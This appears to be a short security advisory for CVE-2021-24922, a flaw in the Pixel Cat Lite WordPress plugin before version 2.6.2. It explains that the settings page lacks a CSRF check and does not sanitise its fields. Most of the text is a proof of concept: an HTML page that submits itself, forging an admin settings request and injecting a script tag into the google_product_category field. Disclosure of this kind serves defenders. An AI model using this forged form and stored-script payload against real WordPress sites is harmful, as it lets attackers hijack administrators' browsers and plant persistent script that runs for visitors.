Pixel Cat Lite < 2.6.2 – CSRF to Stored Cross-Site Scripting | CVE 2021-24922

Description

The plugin does not have CSRF check when saving its settings, and did not sanitise as well as escape some of them, which could allow attacker to make a logged in admin change them and perform Cross-Site Scripting attacks

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
      <input type="hidden" name="fca_pc[has_save]" value="1" />
      <input type="hidden" name="fca_pc_save" value="1" />
      <input type="hidden" name="fca[trigger_type]" value="post" />
      <input type="hidden" name="fca_pc[event_name]" value="" />
      <input type="hidden" name="fca_pc[value]" value="" />
      <input type="hidden" name="fca_pc[currency]" value="" />
      <input type="hidden" name="fca_pc[content_name]" value="" />
      <input type="hidden" name="fca_pc[content_type]" value="product" />
      <input type="hidden" name="fca_pc[content_ids]" value="" />
      <input type="hidden" name="fca_pc[content_category]" value="" />
      <input type="hidden" name="fca_pc[search_string]" value="" />
      <input type="hidden" name="fca_pc[num_items]" value="" />
      <input type="hidden" name="fca_pc[status]" value="" />
      <input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
      <input type="submit" value="submit request" />
    </form>
  </body>
  <script>
      var form1 = document.getElementById('hack');
      form1.submit();
  </script>
</html>